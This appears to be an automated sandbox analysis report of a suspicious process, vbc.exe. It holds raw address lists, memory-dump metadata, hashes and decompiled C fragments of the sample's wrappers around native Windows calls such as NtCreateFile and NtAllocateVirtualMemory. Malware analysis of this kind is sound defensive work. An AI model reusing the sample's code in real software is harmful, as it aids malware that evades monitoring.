0x0126bc7d
0x0126bc7d
0x0126bc7f
0x0126bc81
0x0126bc84
0x0126bc86
0x0126bc89
0x0126bc8b
0x0126bc8d
0x0126bc90
0x0126bc92
0x0126bc94
0x0126bc96
0x0126bc96
0x0126bc96
0x0126bc97
0x0126bd08
0x0126bd0a
0x0126bd0a
0x0126bd0c
0x00000000
0x0126bd0e
0x0126bd0e
0x0126bd12
0x0126bd13
0x0126bd14
0x0126bd16
0x0126bd18
0x0126bd18
0x00000000
0x0126bd18
0x0126bc99
0x0126bc99
0x0126bc9b
0x0126bc9d
0x0126bc9d
0x0126bc9f
0x0126bc44
0x0126bc44
0x0126bc46
0x0126bc47
0x00000000
0x0126bc49
0x0126bc49
0x0126bc4b
0x0126bc4e
0x0126bc50
0x0126bc52
0x0126bc55
0x0126bc57
0x0126bc57
0x00000000
0x0126bc57
0x0126bca1
0x0126bca1
0x0126bca3
0x0126bca5
0x0126bca7
0x0126bcaa
0x0126bcac
0x0126bcaf
0x0126bcb1
0x0126bcb1
0x0126bcb2
0x0126bcb2
0x0126bcb2
0x0126bcb4
0x0126bc59
0x0126bc59
0x0126bc5a
0x0126bc5b
0x0126bc5d
0x0126bc5f
0x0126bc62
0x0126bc62
0x00000000
0x0126bcb6
0x0126bcb6
0x0126bcb8
0x0126bcba
0x0126bcbb
0x0126bcbc
0x0126bcc0
0x0126bcc0
0x0126bcc2
0x0126bcc3
0x0126bcc8
0x0126bccb
0x0126bccb
0x0126bccc
0x0126bccc
0x0126bccf
0x0126bcd0
0x0126bcd2
0x0126bcd4
0x0126bcd4
0x0126bcd6
0x00000000
0x0126bcd8
0x0126bcd8
0x0126bcda
0x0126bcda
0x0126bcdc
0x0126bcdd
0x0126bcdf
0x0126bd50
0x0126bd50
0x0126bd53
0x0126bd56
0x0126bd5b
0x0126bd5d
0x0126bd62
0x0126bd64
0x0126bd66
0x0126bd67
0x0126bd68
0x0126bd6d
0x0126bd70
0x0126bd72
0x0126bd72
0x0126bd73
0x0126bd73
0x0126bd73
0x0126bd75
0x0126bd1b
0x0126bd1b
0x0126bd1d
0x0126bd1f
0x0126bd20
0x0126bd22
0x0126bd24
0x0126bd24
0x0126bd26
0x00000000
0x00000000
0x00000000
0x00000000
0x0126bd77
0x0126bd77
0x0126bd77
0x0126bd78
0x0126bd78
0x0126bd78
0x0126bd78
0x0126bd79
0x0126bd7b
0x0126bd7c
0x0126bd7e
0x0126bd80
0x0126bd80
0x0126bd82
0x0126bd28
0x0126bd28
0x0126bd2a
0x0126bd2c
0x0126bd2d
0x0126bd30
0x0126bd32
0x0126bd35
0x0126bd37
0x0126bd39
0x0126bd3c
0x0126bd45
0x0126bd45
0x00000000
0x0126bd84
0x0126bd84
0x0126bd86
0x0126bd86
0x0126bd88
0x0126bd89
0x0126bd8b
0x0126bdfc
0x0126bdfc
0x0126bdfe
0x0126be00
0x0126be00
0x0126bd8d
0x0126bd8d
0x0126bd92
0x0126bd95
0x0126bd97
0x0126bd97
0x0126bd98
0x0126bd99
0x0126bd9a
0x0126bd9c
0x0126bd9e
0x0126bd9e
0x0126bda0
0x0126bd46
0x0126bd46
0x0126bd48
0x0126bd4a
0x0126bd4a
0x0126bda2
0x0126bda2
0x0126bda6
0x0126bda8
0x0126bda8
0x0126bdad
0x0126bdaf
0x0126bdaf
0x0126bdb1
0x0126bdb2
0x0126bdb4
0x0126bdb6
0x0126bdb6
0x0126bdb8
0x0126bd4f
0x0126bd4f
0x00000000
0x0126bdba
0x0126bdba
0x0126bdbc
0x0126bdbe
0x0126bdbf
0x0126bdc1
0x0126bdc1
0x0126bdc3
0x00000000
0x0126bdc5
0x0126bdc5
0x0126bdc7
0x0126bdc9
0x0126bdca
0x0126bdcc
0x0126bdce
0x0126bdd1
0x0126bdd1
0x0126bdd2
0x0126bdd5
0x0126bdd6
0x0126bdd8
0x0126bdda
0x0126bdda
0x0126bddc
0x00000000
0x0126bdde
0x0126bdde
0x0126bde0
0x0126bde2
0x0126bde3
0x0126bde6
0x0126bde8
0x0126bdeb
0x0126bded
0x0126bdf2
0x0126bdf4
0x0126bdf6
0x0126bdf6
0x0126bdf7
0x0126bdf9
0x0126be6a
0x0126be6a
0x0126be6c
0x0126be71
0x0126be73
0x0126be75
0x0126be76
0x0126be78
0x0126be7a
0x0126be7e
0x0126be7e
0x0126be7f
0x0126be7f
0x0126be7f
0x0126be7f
0x0126be82
0x0126be87
0x0126be89
0x0126be8b
0x0126be8c
0x0126be8e
0x0126be90
0x0126be94
0x0126be96
0x0126be96
0x0126be98
0x0126be99
0x0126be99
0x0126be9b
0x0126be9e
0x0126be9e
0x0126be9f
0x0126bea1
0x0126bea2
0x0126bea4
0x0126bea6
0x0126beaa
0x0126beac
0x0126beac
0x0126beae
0x0126beb3
0x0126beb3
0x0126beb5
0x0126beb7
0x0126beb8
0x0126beba
0x0126bebc
0x0126bec0
0x0126bec7
0x0126bec7
0x0126bec9
0x00000000
0x00000000
0x0126becb
0x0126becb
0x0126becd
0x0126becd
0x0126becd
0x0126becf
0x0126bed0
0x0126bed1
0x0126bed2
0x0126bed4
0x0126bed6
0x0126bed9
0x0126bee0
0x0126bee0
0x0126bee2
0x00000000
0x00000000
0x0126bee4
0x0126bee6
0x0126bee6
0x0126bee7
0x0126bee7
0x0126bee9
0x0126beea
0x0126beeb
0x0126beed
0x0126beef
0x0126bef2
0x0126bef9
0x0126bef9
0x0126befb
0x00000000
0x00000000
0x0126befd
0x0126beff
0x0126bf01
0x0126bf02
0x0126bf03
0x0126bf04
0x0126bf06
0x0126bf08
0x0126bf0b
0x0126bf12
0x0126bf12
0x0126bf14
0x00000000
0x00000000
0x0126bf16
0x0126bf18
0x0126bf1a
0x0126bf1b
0x0126bf1c
0x0126bf1d
0x0126bf1f
0x0126bf1f
0x0126bf21
0x0126bf24
0x0126bf2b
0x0126bf2b
0x0126bf2d
0x00000000
0x00000000
0x0126bf2f
0x0126bf31
0x0126bf33
0x0126bf34
0x0126bf35
0x0126bf36
0x0126bf38
0x0126bf3d
0x0126bf3f
0x0126bf3f
0x0126bf41
0x0126bf42
0x00000000
0x0126bf42
0x00000000
0x0126bee7
0x00000000
0x0126bdfb
0x0126bdfb
0x0126bdfb
0x00000000
0x0126bdfb
0x0126bdf9
0x0126bddc
0x0126bdc3
0x0126bdb8
0x0126bda0
0x0126bd8b
0x0126bd82
0x0126bce1
0x0126bce1
0x0126bce6
0x0126bce9
0x0126bceb
0x0126bceb
0x0126bced
0x0126bcee
0x0126bcf0
0x0126bcf0
0x0126bcf1
0x0126bcf3
0x0126bcf3
0x0126bcf3
0x0126bcdf
0x0126bcd6
0x0126bcb4
0x0126bc9f
0x0126bc97
0x0126bc7b
0x0126bbf5
0x0126bbf5
0x0126bbf7
0x0126bbf9
0x0126bbf9
0x0126bbfb
0x0126bbfc
0x0126bbfc
0x0126bbfc
0x0126bbf3
0x0126bbea
0x0126bbd2
0x0126bbc5
0x0126bb45
0x0126bb45
0x0126bb47
0x0126bb49
0x0126bb49
0x0126bb4b
0x00000000
0x0126bb4d
0x0126bb4d
0x0126bb4f
0x0126bb51
0x0126bb53
0x0126bb56
0x0126bb58
0x0126bb5b
0x0126bb5b
0x0126bb5c
0x0126bb5c
0x0126bb5e
0x0126bb5e
0x0126bb60
0x00000000
0x0126bb60
0x0126bb4b
0x00000000
0x0126bb61
0x0126bb61
0x0126bb61
0x0126bb25
0x00000000
0x0126bb03
0x00000000
0x0126bafb
0x00000000
0x0126baee
0x0126ba6c
0x0126ba84
0x0126ba84
0x0126ba86
0x0126ba89
0x0126ba8b
0x0126ba8d
0x0126ba90
0x0126ba92
0x0126ba94
0x0126ba95
0x0126ba95
0x0126ba95
0x0126ba96
0x0126ba98
0x0126ba9a
0x0126ba9d
0x0126ba9d
0x0126ba9e
0x0126ba9e
0x0126ba9e
0x0126ba9e
0x0126baa1
0x0126baa1
0x0126baa1
0x0126baa3
0x0126baa6
0x0126baa8
0x0126baaa
0x0126baaa
0x0126baac
0x0126ba5f
0x0126baae
0x0126baae
0x0126bab2
0x0126bab3
0x0126bab3
0x0126bab4
0x0126bab4
0x00000000
0x0126bab4
0x0126baac
0x00000000

Memory Dump Source

Source File: 00000004.00000002.997925287.0000000001262000.00000020.00000001.01000000.00000004.sdmp, Offset: 01260000, based on PE: true

Associated: 00000004.00000002.997920683.0000000001260000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.998325826.0000000001314000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1260000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1772cc40dcb30df0ab48605e62a559957cd80c8d5873ebfb0e2c7570a78de124
Instruction ID: 8cef6ebbe3208def181ada99f4a9636bb13f5d6c87d9cb1dc626e6b237492666
Opcode Fuzzy Hash: 1772cc40dcb30df0ab48605e62a559957cd80c8d5873ebfb0e2c7570a78de124
Instruction Fuzzy Hash: 1142CE51A1E7C29FDB074B781DB5294BFB4AD5321475E18C3C0C0CF0EBE21869AAE726

Uniqueness

Uniqueness Score: -1.00%

Function 002E0708 Relevance: .2, Instructions: 236COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.996768196.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e0000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 421827b7803927c3280bdc27a384e9ae08d46007b0fb8c0ca84be9a2cd7ca0d8
Instruction ID: 988157b9c05c12f38eee821e839bac590b6686e86294269a760b720b828e781d
Opcode Fuzzy Hash: 421827b7803927c3280bdc27a384e9ae08d46007b0fb8c0ca84be9a2cd7ca0d8
Instruction Fuzzy Hash: B7A1EF74D01258CFDB14DFA6C4847EEBBB2BF89304F60856AC409AB356DB759986CF80

Uniqueness

Uniqueness Score: -1.00%

Function 006855B8 Relevance: .1, Instructions: 105COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.997698805.0000000000680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_680000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 41668273aa84113b8e6920267b884947351137716e8c0d88020b75f9159bfe43
Instruction ID: e497d5d751ff1336e80a74f570291146905f1f5bb7dbbe239516004270d409b4
Opcode Fuzzy Hash: 41668273aa84113b8e6920267b884947351137716e8c0d88020b75f9159bfe43
Instruction Fuzzy Hash: 664152B1D056588BEB5CCF6B8D4468EFAF3AFC8301F18C1BA850DAB215DB3109858F41

Uniqueness

Uniqueness Score: -1.00%

Function 00D50308 Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.997877270.0000000000D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d50000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f83fe5697c9271e5aa7fec8adfd4f871ac2afb63fbe49553e10a3e122d5e1733
Instruction ID: e567e03a7504d9d0e2a7f50fc7b90e1ba94aece09255ab371be2ba4b0d57e70d
Opcode Fuzzy Hash: f83fe5697c9271e5aa7fec8adfd4f871ac2afb63fbe49553e10a3e122d5e1733
Instruction Fuzzy Hash: D4415571E05B188BEB5CCF6B9D4129AFAF7AFC9301F14D1BA894CAA265DB3005468F11

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: vbc.exePID: 1072, Parent PID: 1200COMMON

Execution Graph

Execution Coverage:	3.6%
Dynamic/Decrypted Code Coverage:	2.3%
Signature Coverage:	5.7%
Total number of Nodes:	615
Total number of Limit Nodes:	78

Executed Functions

Function 0040A140 Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0040A140(void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t30;
				void* _t31;
				void* _t32;

				_v8 =  &_v536;
				_t15 = E0041CDC0( &_v12, 0x104, _a8);
				_t31 = _t30 + 0xc;
				if(_t15 != 0) {
					_t17 = E0041D1E0(__eflags, _v8);
					_t32 = _t31 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E0041D460( &_v12, 0);
						_t32 = _t32 + 8;
					}
					_t18 = E0041B500(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}

0x0040a15c
0x0040a15f
0x0040a164
0x0040a169
0x0040a173
0x0040a178
0x0040a17b
0x0040a17d
0x0040a185
0x0040a18a
0x0040a18a
0x0040a191
0x0040a199
0x0040a19c
0x0040a19e
0x0040a1b2
0x00000000
0x0040a1b4
0x0040a1ba
0x0040a16e
0x0040a16e
0x0040a16e

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040A1B2

Memory Dump Source

Source File: 00000009.00000002.1069986638.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: c06de1ea13a8af031dc4c62c0dda777427f6ee9b41022bae029d2c9e7cdc61ad
Instruction ID: 11ee5f3ab083712590cb1e55c2eb63b1a51d73a2d1413e9428d26e0fcce9e281
Opcode Fuzzy Hash: c06de1ea13a8af031dc4c62c0dda777427f6ee9b41022bae029d2c9e7cdc61ad
Instruction Fuzzy Hash: 810152B5E0020DB7DF10DBA1DC42FDEB7789B54308F0441A9E908A7281F634EB548B95

Uniqueness

Uniqueness Score: -1.00%

Function 0041A310 Relevance: 1.5, APIs: 1, Instructions: 40
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0041A310(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;

				_t3 = _a4 + 0xc5c; // 0xc5c
				E0041AF60( *((intOrPtr*)(_a4 + 0x14)), _t15, _t3,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}

0x0041a31f
0x0041a327
0x0041a35d
0x0041a361

APIs

NtCreateFile.NTDLL(00000060,00409113,?,00415807,00409113,FFFFFFFF,?,?,FFFFFFFF,00409113,00415807,?,00409113,00000060,00000000,00000000), ref: 0041A35D

Memory Dump Source

Source File: 00000009.00000002.1069986638.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: ede47e358c6f592494742841678bda465d8b9d6efb767baf41057bbc73943ae4
Instruction ID: 22a17d5a8ca0ee81e299f457139f331d0ae15f1ba5b0ed3d189dcc3aa1234c62
Opcode Fuzzy Hash: ede47e358c6f592494742841678bda465d8b9d6efb767baf41057bbc73943ae4
Instruction Fuzzy Hash: 9CF06DB6215208AFCB48DF89DC85EEB77ADAF8C754F158248BA0D97241D630F8518BA4

Uniqueness

Uniqueness Score: -1.00%

Function 0041A30C Relevance: 1.5, APIs: 1, Instructions: 39
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 79%

			E0041A30C(void* __eax, intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t23;

				asm("cli");
				_t17 = _a4;
				_t3 = _t17 + 0xc5c; // 0xc5c
				E0041AF60( *((intOrPtr*)(_a4 + 0x14)), _t17, _t3,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x28);
				_t23 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t23;
			}

0x0041a30e
0x0041a313
0x0041a31f
0x0041a327
0x0041a35d
0x0041a361

APIs

NtCreateFile.NTDLL(00000060,00409113,?,00415807,00409113,FFFFFFFF,?,?,FFFFFFFF,00409113,00415807,?,00409113,00000060,00000000,00000000), ref: 0041A35D

Memory Dump Source

Source File: 00000009.00000002.1069986638.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 096de45c29c7e855336afe3d0c2af4b78dab0c9965d5927c13043ab8df212e26
Instruction ID: 263d1f3f99240851049625e71f71d18099490efd6d8311ba672ad34fb7675b53
Opcode Fuzzy Hash: 096de45c29c7e855336afe3d0c2af4b78dab0c9965d5927c13043ab8df212e26
Instruction Fuzzy Hash: 8DF0E2B2214149AFCB08CF98DD85CEB77A9EF8C754B15868DFA1D93202D634E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0041A3C0 Relevance: 1.5, APIs: 1, Instructions: 36
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 37%

			E0041A3C0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40) {
				intOrPtr* _t14;
				void* _t18;
				intOrPtr* _t27;

				_t13 = _a4;
				_t27 = _a4 + 0xc64;
				_t14 = E0041AF60( *((intOrPtr*)(_t13 + 0x14)), _t13, _t27,  *((intOrPtr*)(_t13 + 0x14)), 0, 0x2a);
				 *_t14 =  *_t14 + _t14;
				_t18 =  *((intOrPtr*)( *_t27))(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40); // executed
				return _t18;
			}

0x0041a3c3
0x0041a3cf
0x0041a3d7
0x0041a3da
0x0041a405
0x0041a409

APIs

NtReadFile.NTDLL(004159C2,5DA515B3,FFFFFFFF,00415681,?,?,004159C2,?,00415681,FFFFFFFF,5DA515B3,004159C2,?,00000000), ref: 0041A405

Memory Dump Source

Source File: 00000009.00000002.1069986638.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: b510bff5fdfeed8eb0fffb7cee2b24ec4e8af31a288f6594e015d3a0b80bf648
Instruction ID: 73ffa567400af51592167d85ddd4e2221f8c27920a6f65a97cb7e9eff46762f8
Opcode Fuzzy Hash: b510bff5fdfeed8eb0fffb7cee2b24ec4e8af31a288f6594e015d3a0b80bf648
Instruction Fuzzy Hash: 99F0B7B2200208AFCB14DF99DC85EEB77ADEF8C754F158249BE0D97241D630E811CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0041A4F0 Relevance: 1.5, APIs: 1, Instructions: 30
memorynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0041A4F0(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;

				_t3 = _a4 + 0xc7c; // 0x3c7c
				E0041AF60( *((intOrPtr*)(_a4 + 0x14)), _t10, _t3,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}

0x0041a4ff
0x0041a507
0x0041a529
0x0041a52d

APIs

NtAllocateVirtualMemory.NTDLL(?,00000000,?,0041B19D,?,0041B19D,?,00000000,?,00003000,00000040,00409113,00000000), ref: 0041A529

Memory Dump Source

Source File: 00000009.00000002.1069986638.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: 3937d7bcd71450592b7c43b4c62eb3862b139fe450dcdc5e45fc7760e87cf521
Instruction ID: 0f6e90ac6ad316f0230f9505ffb1913ba8f116b783957ff2d7da3ee6bc7086c1
Opcode Fuzzy Hash: 3937d7bcd71450592b7c43b4c62eb3862b139fe450dcdc5e45fc7760e87cf521
Instruction Fuzzy Hash: 53F0F2B2210208ABDB14DF89DC81EAB77ADAF8C654F118109BA0897241C630E8118BA4

Uniqueness

Uniqueness Score: -1.00%

Function 0041A440 Relevance: 1.5, APIs: 1, Instructions: 20
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0041A440(intOrPtr _a4, void* _a8) {
				long _t8;

				_t5 = _a4;
				_t2 = _t5 + 0x14; // 0x56c29f0f
				_t3 = _t5 + 0xc6c; // 0x409d7f
				E0041AF60( *_t2, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}

0x0041a443
0x0041a446
0x0041a44f
0x0041a457
0x0041a465
0x0041a469

APIs

NtClose.NTDLL(004159A0,?,?,004159A0,00409113,FFFFFFFF), ref: 0041A465

Memory Dump Source

Source File: 00000009.00000002.1069986638.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 829c97b90c121aadc2fe6170b15f633a5be8987cb5c0fe9b9f6c1e719d211015
Instruction ID: 647376dfd9c4a3ead1cf8bf61973886ae708b244be9dddf4ec43f9330a142b27
Opcode Fuzzy Hash: 829c97b90c121aadc2fe6170b15f633a5be8987cb5c0fe9b9f6c1e719d211015
Instruction Fuzzy Hash: 96D01772200218ABD620EB99DC89ED77BACDF48A64F118055BA4C5B242C530FA1086E1

Uniqueness

Uniqueness Score: -1.00%

Function 008800C4 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 008800CF

Memory Dump Source

Source File: 00000009.00000002.1070186270.0000000000870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00860000, based on PE: true

Associated: 00000009.00000002.1070174903.0000000000860000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1070372671.0000000000950000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1070380153.0000000000960000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1070386359.0000000000964000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1070392298.0000000000967000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1070398282.0000000000970000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1070430882.00000000009D0000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_860000_vbc.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846

Uniqueness

Uniqueness Score: -1.00%

Function 00880048 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00880053

Memory Dump Source

Source File: 00000009.00000002.1070186270.0000000000870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00860000, based on PE: true

Associated: 00000009.00000002.1070174903.0000000000860000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1070372671.0000000000950000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1070380153.0000000000960000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1070386359.0000000000964000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1070392298.0000000000967000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1070398282.0000000000970000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1070430882.00000000009D0000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_860000_vbc.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
Instruction ID: 41e4343c146f66e2bb318e135f4e172b2897deff735033a37a94e91f6413aa4b
Opcode Fuzzy Hash: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
Instruction Fuzzy Hash: DBB012B2100540C7E3099714D946B4B7210FB90F00F40C93BA11B81861DB3C993CD46A

Uniqueness

Uniqueness Score: -1.00%

Function 00880078 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00880086

Memory Dump Source

Source File: 00000009.00000002.1070186270.0000000000870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00860000, based on PE: true

Associated: 00000009.00000002.1070174903.0000000000860000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1070372671.0000000000950000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1070380153.0000000000960000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1070386359.0000000000964000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1070392298.0000000000967000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1070398282.0000000000970000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1070430882.00000000009D0000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_860000_vbc.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
Instruction ID: 3a645d05db048e5a2937cf36c3d58d647fc753ae06e93f94360992995f7f05c0
Opcode Fuzzy Hash: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
Instruction Fuzzy Hash: 2AB012B1504640C7F304F704D905B16B212FBD0F00F408938A14F86591D73DAD2CC78B

Uniqueness

Uniqueness Score: -1.00%

Function 0087F9F0 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0087F9FB

Memory Dump Source

Source File: 00000009.00000002.1070186270.0000000000870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00860000, based on PE: true

Associated: 00000009.00000002.1070174903.0000000000860000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1070372671.0000000000950000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1070380153.0000000000960000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1070386359.0000000000964000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1070392298.0000000000967000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1070398282.0000000000970000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1070430882.00000000009D0000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_860000_vbc.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A

Uniqueness

Uniqueness Score: -1.00%

Function 0087F900 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0087F90E

Memory Dump Source

Source File: 00000009.00000002.1070186270.0000000000870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00860000, based on PE: true

Associated: 00000009.00000002.1070174903.0000000000860000.00000040.00000800.00020000.00000000.sdmpDownload File
